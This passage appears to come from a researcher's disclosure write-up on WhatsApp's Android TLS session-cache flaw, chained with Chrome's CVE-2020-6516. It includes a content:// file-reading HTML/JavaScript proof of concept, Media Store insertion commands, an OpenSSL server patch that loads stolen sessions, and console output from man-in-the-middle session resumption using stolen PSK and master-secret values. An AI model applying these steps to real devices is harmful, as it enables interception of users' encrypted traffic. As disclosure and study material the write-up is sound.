A proof-of-concept is pretty straightforward. An HTML document that uses XMLHttpRequest to access arbitrary content:// URLs is uploaded under /sdcard. It is then added to the Media Store and rendered in Chrome, in a fashion similar to the example shown earlier. For demonstration purposes, one can attempt to load content://media/external/file/747, which is, in fact, the Media Store URL of the "Hello, world!" example.
Surprisingly, the Javascript code, running within the origin of the HTML document, will fetch and display the contents of test.txt.

<html>
<head>
<title>PoC</title>
<script type="text/javascript">
function poc() {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if(this.readyState == 4) {
            if(this.status == 200 || this.status == 0) {
                alert(xhr.response);
            }
        }
    }
    xhr.open("GET", "content://media/external/file/747");
    xhr.send();
}
</script>
</head>
<body onload="poc()"></body>
</html>

To see this in action, upload the HTML document shown above on the device under /sdcard/test.html. Then insert it in the Media Store's database:

$ content insert --uri content://media/external/file \
    --bind _data:s:/storage/emulated/0/test.html \
    --bind mime_type:s:text/html

To read the identifier of the newly inserted file, execute the following command. In this example, test.html's _id is 617.

$ content query --uri content://media/external/file \
    --projection _id,_data | grep test.html
Row: 312 _id=617, _data=/storage/emulated/0/test.html

To execute the proof-of-concept code, open content://media/external/file/617 in Chrome. You should see something like the following:

One may ask, "but how is WhatsApp related to this Chrome vulnerability?". If an attacker sends a malicious HTML file to a victim user over WhatsApp, then when this file is viewed it will actually be rendered using Chrome. Chrome will use a content provider internal to WhatsApp to access the malicious Javascript content. However, due to the CVE-2020-6516 Chrome bug, the malicious code will be able to access any other resource from any other content provider on the system. The astute reader might remember that we had found that WhatsApp placed the SSLSessionCache and watls-sessions directories under unprotected external storage. These directories contain TLS session cryptographic material.
This material could have been collected in the way we just explained, by a remote attacker, through a phishing attack. In the sections that follow we will explain how session resumption works for TLS 1.3 and TLS 1.2, but also how the collected cryptographic material could be used to conduct man-in-the-middle attacks against victim users.

Session Resumption and Pre-Shared Keys in TLS 1.3

TLS connections go through a process referred to as the TLS handshake. During this process, communicating peers will authenticate each other, negotiate cryptographic parameters and determine various aspects of the connection via a set of agreed-upon extensions. Server identity authentication uses asymmetric cryptography (for X509 certificate validation etc.), which is a computationally intensive process, especially for smaller form-factor embedded devices (e.g. mobile phones). For TLS 1.3, the handshake protocol is analyzed in section 4 of RFC 8446 [17].

To reduce power consumption and save CPU cycles when multiple or simultaneous TLS connections are established in a short period of time, session resumption was proposed. In TLS 1.3, session resumption is based on Pre-Shared Keys (PSKs). PSKs are typically established in-band, after a successful certificate-based authentication (although it is also possible to establish them out-of-band through, for example, secrets on a piece of paper). During session resumption, knowledge of the PSK acts as the sole authentication mechanism between the client and the server. No other (e.g. certificate-based) authentication is required by the communicating peers. Avoiding the asymmetric cryptography of certificate-based authentication makes session resumption faster and greener in terms of power consumption.
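To see concretely why resumption needs no asymmetric operations, recall that the TLS 1.3 key schedule (RFC 8446, section 7.1) begins by feeding the PSK into HKDF-Extract; every later secret is derived from the result with HKDF as well, i.e. with symmetric primitives only. A minimal sketch of just that first step (illustrative, not a full key schedule; the PSK value is an arbitrary 32-byte example):

```python
import hashlib
import hmac

def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """HKDF-Extract (RFC 5869): PRK = HMAC-Hash(salt, IKM)."""
    return hmac.new(salt, ikm, hashlib.sha256).digest()

# First step of the TLS 1.3 key schedule (RFC 8446, section 7.1):
#   Early Secret = HKDF-Extract(salt = 0..0, IKM = PSK)
# No certificates or public-key operations are involved at any point.
psk = bytes.fromhex(
    "C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353"
)
early_secret = hkdf_extract(b"\x00" * 32, psk)
print(early_secret.hex())
```

Whoever holds the PSK can perform this derivation, which is exactly what makes a stolen PSK so valuable to an attacker.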
The above leads to an interesting conclusion: if a remote attacker could collect the PSK from the client device, then it would be possible to mount a man-in-the-middle attack against this client during TLS session resumption, as no certificate validation would be performed against the fraudulent server endpoint.

In Android, certificate validation is performed by the framework, but application developers are allowed to override this process for the purpose of implementing their own custom certificate handling/pinning mechanism. Certificate pinning enables apps to only proceed with a connection if the presented certificate has certain characteristics (e.g. has a certain public key, is signed by a certain intermediate certificate etc.). The class responsible for handling server-presented certificates is X509TrustManager, and developers are free to inherit from it and override its checkServerTrusted() method. However, as no certificate validation is performed during TLS session resumption, the X509TrustManager is never consulted, and thus no standard or custom certificate validation (e.g. pinning checks) will take place. This becomes the perfect opportunity for a man-in-the-middle attack.

Page 8 of RFC 8446, for TLS 1.3, notes that:

"Session resumption with and without server-side state as well as the PSK-based cipher suites of earlier TLS versions have been replaced by a single new PSK exchange."

This means that all PSK-related actions have been homogenized (both PSK cipher suites and PSKs for session resumption) in TLS 1.3. This makes it easy for us to create the man-in-the-middle endpoint for session resumption through standard tools such as the openssl s_server implementation. The attacker-controlled s_server instance does not need to look up the right PSK to use for the incoming connection, as this can be fixed to the collected one (through the -psk parameter).
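The difference between a normal server-side PSK lookup and the fixed-PSK behaviour of the patched s_server can be sketched with a toy comparison (hypothetical illustration, not the actual PoC code; the PSK value is the Resumption PSK used throughout this article):

```python
from typing import Dict, Optional

# PSK collected from the victim's watls-sessions cache files.
STOLEN_PSK = bytes.fromhex(
    "C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353"
)

def legitimate_psk_lookup(cache: Dict[bytes, bytes], identity: bytes) -> Optional[bytes]:
    # A real server treats the PSK identity purely as a cache key:
    # unknown identity means no PSK, hence a full handshake.
    return cache.get(identity)

def attacker_psk_lookup(identity: bytes) -> bytes:
    # The MitM endpoint skips the lookup entirely: whatever identity the
    # client presents, the collected PSK is used (the -psk behaviour).
    return STOLEN_PSK

print(attacker_psk_lookup(b"Client_identity").hex())
```

The point of the sketch is that nothing forces the server to honour the identity; any endpoint holding the PSK bytes can answer the resumption attempt.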
Furthermore, TLS 1.3 uses a PSK binder value to have the client prove to the server that it is indeed the true owner of a previously established PSK. The attacker-controlled endpoint is free to ignore this value, and will proceed to establish the connection, as implemented in our patch for OpenSSL, found in the PoC repository [37] under openssl-1.1.1f-patches/watls-mitm.patch.

To demonstrate the above, let's use the OpenSSL client to connect to one of WhatsApp's servers that uses TLS v1.3. Session information can be stored, for resumption at a later time, using the -sess_out command line switch, as shown below:

$ openssl s_client -host media-sof1-1.cdn.whatsapp.net -port 443 -sess_out /tmp/session.pem

Let's have a look at the corresponding PSK:

$ openssl sess_id -in /tmp/session.pem -text | grep PSK
    Resumption PSK: C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
    PSK identity: None
    PSK identity hint: None

Next, follow the instructions in our PoC's watls_psk_extract/README.md to prepare a modified OpenSSL variant, capable of performing TLS v1.3 MitM, and execute run_server.sh, passing it the extracted PSK, as shown below:

$ cd watls_psk_extract
$ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
Using PSK C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
Running WaTLS version
ACCEPT

If our theory is correct, one can now use /tmp/session.pem to connect to localhost and resume the session that was initially established with media-sof1-1.cdn.whatsapp.net.
Indeed, using OpenSSL's s_client and the -sess_in command line switch, we can do the following:

$ openssl s_client -sess_in /tmp/session.pem -host localhost -port 443
CONNECTED(00000006)
Can't use SSL_get_servername
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz
dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla
MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN
ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53
aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl
bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz
qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw
HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru
LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv
bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw
Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF
BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z
aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0
LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw
KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr
BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv
bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD
ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC
AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/
LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO
7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3
AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw
RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE
sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE
eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og
GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3
komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP
tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ
9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb
rGufx1+jMcviB6M=
-----END CERTIFICATE-----
subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net
issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA
---
No client certificate CA names sent
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 225 bytes and written 534 bytes
Verification: OK
---
Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256
Server public key is 256 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 0 (ok)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
    Protocol : TLSv1.3
    Cipher : TLS_AES_128_GCM_SHA256
    Session-ID: D600D456331645CDF46A5426F3CE7801CE228B98195D7E511D8A5F4F783F225F
    Session-ID-ctx:
    Resumption PSK: ACEE401AC866A076351CD495517260327104CF08BD1CBFB75299ADB658991B2C
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 304 (seconds)
    TLS session ticket:
    0000 - ff 64 91 18 ea 0a 17 1c-2f 10 20 52 ef 08 7a 8a   .d....../. R..z.
    0010 - 94 91 f4 ff 47 f0 28 d4-78 e5 65 a0 6d f0 c0 fe   ....G.(.x.e.m...
    Start Time: 1615551534
    Timeout : 7200 (sec)
    Verify return code: 0 (ok)
    Extended master secret: no
    Max Early Data: 0
---
read R BLOCK
read:errno=0

There are a few things worth noting in the above output. First and foremost, the certificate displayed does not come from the TLS handshake; it was deserialized directly from /tmp/session.pem, as the latter was used for session resumption purposes.
Next, looking carefully, one can see a message reading Verification: OK, despite the fact that our MitM server uses a self-signed certificate. Furthermore, a few lines below, we are informed that the session was reused (Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256) and that verification was indeed successful (Verify return code: 0 (ok)). From the client's perspective, everything seems normal and the connection is resumed.

The modified s_server accepts the connection, but receives a PSK binder which is HMAC'ed with an unknown key. However, the binder is ignored, and since the exact PSK value was specified at the command line, connection establishment can proceed as usual. When that happens, the following output is printed at the server's console:

$ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353
...
PSK warning: client identity not what we expected (got '...' expected 'Client_identity')
Ignoring PSK binders!

Another thing to note here is that, clearly, the PSK identity is not important for the server. It is just a lookup key in a cache (a hash table of PSKs, for example) and does not constitute a cryptographic proof of any kind. The server accepts the connection despite the fact that a different PSK identity was expected.

Session Resumption and the Master Secret in TLS 1.2

In TLS 1.2, session resumption is based solely on knowledge of the master secret; if the two communicating parties have saved their previous state in a secure location, they can continue communicating by re-deriving new session keys based on the previously agreed-upon shared secret. As with TLS 1.3, session resumption does not go through any other form of authentication (e.g. certificate validation). The handshake protocol of TLS 1.2 is analyzed in section 7 of RFC 5246 [21], while session resumption is covered in section F.1.4:

"When a connection is established by resuming a session, new ClientHello.random and ServerHello.random values are hashed with the session's master_secret.
Provided that the master_secret has not been compromised and that the secure hash operations used to produce the encryption keys and MAC keys are secure, the connection should be secure and effectively independent from previous connections. Attackers cannot use known encryption keys or MAC secrets to compromise the master_secret without breaking the secure hash operations."

"The client sends a ClientHello using the Session ID of the session to be resumed. The server then checks its session cache for a match. If a match is found, and the server is willing to re-establish the connection under the specified session state, it will send a ServerHello with the same Session ID value."

Again, the session ID serves no cryptographic purpose other than probably playing the role of an index into the server's session cache. Moreover, it should be noted that the use of extended master secrets [22] does not protect against stolen master keys.

To see how this works in practice, one can do the following. First, connect to one of WhatsApp's servers using TLS v1.2 and store the session on disk using -sess_out, as shown below:

$ openssl s_client -tls1_2 -host crashlogs.whatsapp.net -port 443 -sess_out /tmp/session.pem

Carefully examine the output of the above command. There should be no verification errors or anything of the sort, as WhatsApp's infrastructure uses certificates issued by DigiCert. The session identifier and the master secret of the saved session can be examined using the following command:

$ openssl sess_id -in /tmp/session.pem -text | egrep '(Master|Session)'
SSL-Session:
    Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A
    Session-ID-ctx:
    Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137

Now, enter directory tls12_psk_extract in the PoC repository [37], copy /tmp/session.pem there and convert it to DER format:

$ pwd
[..]/whatsapp-mitd-mitm/tls12_psk_extract
$ cp /tmp/session.pem .
$ openssl sess_id -inform PEM -in session.pem -outform DER -out session.der

Unfortunately, unlike s_client, OpenSSL's s_server does not allow specifying a master secret or a session ID at the command line for the purpose of accepting resumed TLS 1.2 sessions (i.e. there is no -psk equivalent for TLS 1.2). For this purpose, we modified OpenSSL's ssl/ssl_sess.c to have s_server load a TLS session from an external DER file. Consider it similar to -sess_in of s_client.

+    /* CENSUS: Load the BoringSSL session converted to OpenSSL format. */
+    if(ret == NULL) {
+        int fd;
+        char buf[4096], *bufp = &buf[0];
+        size_t size;
+        SSL_SESSION *session;
+
+        printf("[CENSUS] Loading BoringSSL session from %s\n", SESSION_FILE);
+
+        if((fd = open(SESSION_FILE, O_RDONLY)) >= 0) {
+
+            size = read(fd, buf, sizeof(buf));
+            printf("[CENSUS] Loaded %zu bytes\n", size);
+
+            if((session = d2i_SSL_SESSION(NULL, (const unsigned char **)&bufp, size)) != NULL) {
+                printf("[CENSUS] Session was successfully loaded at %p\n", (void *)session);
+                ret = session;
+            }
+
+            close(fd);
+        }
+    }

With this modification, a client can save TLS session information in a DER file, using -sess_out, and then have an s_server instance load that file during the TLS 1.2 handshake. The effect is similar to the -psk example demonstrated previously; the client, with prior knowledge of the session ID and the master secret, will successfully establish the TLS connection. The corresponding OpenSSL modifications can be found in our PoC repository [37], at openssl-1.1.1f-patches/tls12-mitm.patch.

Follow the instructions in tls12_psk_extract/README.md to prepare an OpenSSL 1.1.1f variant capable of performing TLS 1.2 MitM. When ready, just run the MitM server:

$ ./run_server.sh
...
Running TLS v1.2 version
Using default temp DH parameters
ACCEPT

Using s_client, attempt to resume the session initially established with crashlogs.whatsapp.net, but this time connect to localhost instead.
To do this, use the -sess_in command line switch, as shown below:

$ openssl s_client -tls1_2 -host localhost -port 443 -sess_in /tmp/session.pem
CONNECTED(00000006)
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz
dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla
MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN
ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53
aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl
bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz
qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw
HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru
LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv
bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw
Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF
BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z
aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0
LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw
KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr
BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv
bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD
ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC
AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/
LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO
7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3
AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw
RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE
sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE
eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og
GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3
komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP
tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ
9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb
rGufx1+jMcviB6M=
-----END CERTIFICATE-----
subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net
issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA
---
No client certificate CA names sent
---
SSL handshake has read 141 bytes and written 485 bytes
Verification error: unable to get local issuer certificate
---
Reused, TLSv1.2, Cipher is ECDHE-ECDSA-AES128-GCM-SHA256
Server public key is 256 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol : TLSv1.2
    Cipher : ECDHE-ECDSA-AES128-GCM-SHA256
    Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A
    Session-ID-ctx:
    Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 172800 (seconds)
    TLS session ticket:
    0000 - 8b 5b f6 5b c6 05 a2 36-48 88 79 8e 5d e6 55 f8   .[.[...6H.y.].U.
    0010 - e2 75 43 33 a5 84 b4 8e-60 38 ee e8 bb a8 69 ad   .uC3....`8....i.
    0020 - 56 cb 6e a4 9a f4 93 fd-0a 67 51 f4 68 0d 59 40   V.n......gQ.h.Y@
    0030 - 49 80 97 7b ce 9f 6b fb-73 27 65 df 0e c3 8f b6   I..{..k.s'e.....
    0040 - f7 9a 9c 31 2f b3 e3 8b-32 9c d3 0d 46 30 84 d3   ...1/...2...F0..
    0050 - 89 5c 82 a7 28 9a 41 18-53 9e fa 58 b1 80 78 62   .\..(.A.S..X..xb
    0060 - b3 f6 bc ce bd e5 5b 40-f1 14 16 b4 66 b4 80 48   ......[@....f..H
    0070 - 1c ba d2 ed 23 9f cd 80-b2 56 a1 e8 0f 6b 6d e2   ....#....V...km.
    0080 - 03 40 ba 92 3a f4 a6 b9-ef 35 8e 87 68 6e 54 1a   .@..:....5..hnT.
    0090 - 05 ac eb 5c 2b c4 52 3d-ca f8 6d 91 22 ce 21 d5   ...\+.R=..m.".!.
    00a0 - d4 56 32 35 23 a2 6c 20-31 0e 71 b6 04 24 ac 64   .V25#.l 1.q..$.d
    00b0 - 8f bb 77 d7 97 04 bc 73-71 ff 86 0c e3 a7 45 2e   ..w....sq.....E.
    00c0 - 16 dc ac b9 61 9f 60 d9-c3 cb 2d 73 87 33 53 32   ....a.`...-s.3S2
    Start Time: 1616078131
    Timeout : 7200 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
    Extended master secret: yes
---

Notice that, at the client side, no verification takes place and no error is shown. Since the session identifier and the master secret are both known, the encrypted session is resumed normally. Indeed, taking a closer look at the output above reveals that the session identifier and the master secret have been successfully reused, as they match those of /tmp/session.pem:

SSL-Session:
    Protocol : TLSv1.2
    Cipher : ECDHE-ECDSA-AES128-GCM-SHA256
    Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A
    Session-ID-ctx:
    Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137

At the server side, our modified OpenSSL server loads session.der (produced from /tmp/session.pem), reads the session identifier and the master secret from there, and resumes the session as if nothing were wrong. The following output is displayed:

$ ./run_server.sh
...
[CENSUS] Looking up session 6b0b3946bc2cb7a1...
[CENSUS] SSL_SESS_CACHE_NO_INTERNAL_LOOKUP not set!
[CENSUS] Loading BoringSSL session from session.der
[CENSUS] Loaded 1877 bytes
[CENSUS] Session was successfully loaded at 0x7fc168d21e90
[CENSUS] Session cache miss, no problem!

The session identifier was not found in the server's cache. This is no problem for our MitM server, as a stolen session (session.der) is explicitly loaded and reused, as if it had been found in the cache in the first place. At this point the client believes it is communicating securely; however, its communications are subject to eavesdropping and modification by the man-in-the-middle server!
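To see why a stolen master secret is so powerful, recall that in TLS 1.2 every connection key is expanded from it via the PRF of RFC 5246, section 5: key_block = PRF(master_secret, "key expansion", server_random + client_random). The hello randoms travel in cleartext, so an eavesdropper holding the master secret can compute the same key block as the client. A sketch of the SHA-256-based PRF (the master secret is the Master-Key value shown above; the randoms are placeholders for illustration):

```python
import hashlib
import hmac

def tls12_prf_sha256(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """P_SHA256 from RFC 5246, section 5: expand `secret` into `length` bytes."""
    seed = label + seed
    a = seed  # A(0) = seed
    out = b""
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()            # A(i) = HMAC(secret, A(i-1))
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)
    return out[:length]

# Stolen Master-Key from the session examined above.
master_secret = bytes.fromhex(
    "9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1"
    "EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137"
)
client_random = b"\x01" * 32  # placeholder; visible on the wire in reality
server_random = b"\x02" * 32  # placeholder; visible on the wire in reality

key_block = tls12_prf_sha256(master_secret, b"key expansion",
                             server_random + client_random, 40)
print(key_block.hex())
```

Anyone who can run this derivation with the real randoms obtains the MAC and encryption keys of the resumed connection, which is exactly the capability the man-in-the-middle server exploits.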
The WhatsApp TLS Man-in-the-Disk Vulnerabilities

Privacy is one of WhatsApp's major features. It is achieved by using end-to-end encryption [23] in messages exchanged between clients, as well as through the use of TLS 1.3 / TLS 1.2 for client-to-server communications (the actual protocol used depends on the endpoint) [24]. To take advantage of the benefits offered by TLS session resumption, WhatsApp implements its own TLS-PSK session management code for TLS 1.3 and uses FileClientSessionCache [25] for TLS 1.2. The logic is pretty simple: when a TLS connection is initiated, WhatsApp looks for a previously stored session on the device's filesystem. If one is found, a PSK or master secret is loaded from there and the session is resumed. Otherwise, a full TLS handshake takes place, after which PSK/master secrets might be established and stored for future use.

The above TLS session management code introduced two identical man-in-the-disk vulnerabilities, one affecting TLS 1.2 connections and one affecting TLS 1.3 connections. The problem is that WhatsApp stores the aforementioned TLS session information in the directory returned by Context.getExternalCacheDir(). This directory lies under the external storage of /sdcard. Any Android app holding the READ_EXTERNAL_STORAGE or WRITE_EXTERNAL_STORAGE permission could gain read/write access to these files through the filesystem on Android 10 and previous versions of Android. Alternatively, these files were indexed and made available to other apps through the Media Store content provider on Android 9 and previous versions of Android.

WaTLS (WhatsApp TLS) is WhatsApp's custom Java implementation of TLS 1.3. WaTLS is a full TLS stack, developed from scratch, that comes with its own TLS state machine, packet parsing logic and so on. When connected to the WhatsApp network, a WhatsApp client receives configuration information from the upstream servers.
Among others, the aforementioned configuration controls whether the client should use WaTLS or fall back to the external SSL cache. WaTLS is mostly used for media downloads, including end-to-end (E2E) encrypted media exchanged by users. Other than that, it is used behind the scenes when newly updated WhatsApp installations upload crash statistics (e.g. memory dumps) to WhatsApp cloud servers. Additionally, it seems to have limited usage in VoIP scenarios, but the author has not investigated this further.

As shown below, the WatlsCache class, which controls access to TLS session information cached on disk, stores all data under the directory returned by application.getExternalCacheDir(). The getWatlsFileName() method is called to retrieve the filename that stores the TLS session information corresponding to the session identifier argument.

public class WatlsCache implements WatlsCacheInterface {
    public static final WatlsCache instance = new WatlsCache();
    public String watlsDirName;

    static {
        ...
        if(application != null && application.getExternalCacheDir() != null) {
            String A0C = AnonymousClass0CC.concatStrings(r1.application.getExternalCacheDir().getAbsolutePath(), "/", "watls-sessions");
            File file = new File(A0C);
            ...
            instance.watlsDirName = A0C;
        }
    }
    ...
    public final String getWatlsFileName(byte[] bArr) {
        return this.watlsDirName + "/" + Base64.encodeToString(bArr, 10);
    }
}

Cached items bear filenames that encode (serialize) information about the TLS session endpoint. See, for example, the following filename, which bears base64-encoded information about the hostname, port and cipher suite of a WhatsApp endpoint:

$ echo 'bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2' | base64 -D
media.fath4-2.fna.whatsapp.net#443#TLS_AES_128_GCM_SHA256

For TLS 1.2 connections, WhatsApp relies on facilities offered by Java and consequently by the Android framework.
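As a side note, the watls-sessions cache filenames shown earlier are trivially reversible. A short sketch that unpacks one of them into its endpoint components (assuming, based on the flag value 10 passed to Base64.encodeToString, URL-safe base64 without line wrapping):
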